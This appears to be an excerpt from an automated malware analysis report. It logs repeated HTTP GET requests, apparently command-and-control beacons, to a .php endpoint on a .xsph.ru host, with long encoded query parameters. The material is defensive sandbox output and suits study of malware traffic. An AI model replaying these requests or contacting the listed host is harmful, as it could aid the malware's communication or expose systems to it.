            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=QX9JiI6IiMyEjNwkDO0UWNhJ2M0EjZycDMkRGZ1E2Y0gTZiVzYiJCLiUWM3EGZlVmN1EWYzEWO1cTOmFGNzIWNjNmZ4EGMkZWYyM2N4cTZkVmI6ICMmdDZwEmY2EjYiNmZzkTZ5I2NkFjY0ImMiRjY3kTZkJCLiMGOkFzYzMzN2gTOjFzYzcjMxUDOhRGZxcDMwYTNzImNhRWY3QmMyYmI6IiNlBjMzgzY0EGOxEGNhFWZ5QGO1MzM5QjNyMGZmBjZwIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ruConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMkZXNyEWdWxWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUMjRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpVEVOp3ZE5kMJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiIjMxYDM5gDNlVTYiNDNxYmM3ADZkRWNhNGN4UmY1MmYiwiI1EWO0gjN4UWNjVjMjdTO0kTO3EGNlBzYzUWOmljYhBzYzQmNwcjZ2IiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: a0985701.xsph.ru
            Source: global trafficHTTP traffic detected: GET /8724b2c0.php?NojHfreA=XOUz3&s70=tQaeMHcDQCRT7QXgceCiIA&tJD6pNMml=ZU&d7b761e65d6b27ab6613537ab4fbd2d6=gNiJDZ0MTY1UGNkRWYzMzYwIGOiBTN5YTNxgjN1UzMygTZ3kTMiZ2YxIjN3gTNwMTMzYTO0QDN&64f08b8004af955eddd13c6a6e9c8200=gYwY2N1I2NwUTO1kDOkFmZ4YTNhRDM1YTZhRWNxYGM2cTM4YzN5EmM&dd417e5f2f0794e9aefa76f87ad32878=d1nIlFzNhRWZlZTNhF2MhlTN3kjZhRzMiVzYjZGOhBDZmFmMjdDO3UGZlJiOiAjZ3QGMhJmNxImYjZ2M5UWOidDZxIGNiJjY0I2N5UGZiwiIjhDZxM2MzcjN4kzYxM2M3ITM1gTYkRWM3ADM2UzMiZTYkF2NkJjMmJiOiYTZwIzM4MGNhhTMhRTYhVWOkhTNzMTO0YjMjRmZwYGMis3W&a84a2843b4ef9db88df9dc44c2636162=d1nIiojIyITM2ATO4QTZ1EmYzQTMmJzNwQGZkVTYjRDOlJWNjJmIsISZxcTYkVWZ2UTYhNTY5UzN5YWY0MjY1M2YmhTYwQmZhJzY3gzNlRWZiojIwY2NkBTYiZTMiJ2YmNTOlljY3QWMiRjYyIGNidTOlRmIsIyY4QWMjNzM3YDO5MWMjNzNyETN4EGZkFzNwAjN1MjY2EGZhdDZyIjZiojI2UGMyMDOjRTY4ETY0EWYllDZ4UzMzkDN2IzYkZGMmBjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeO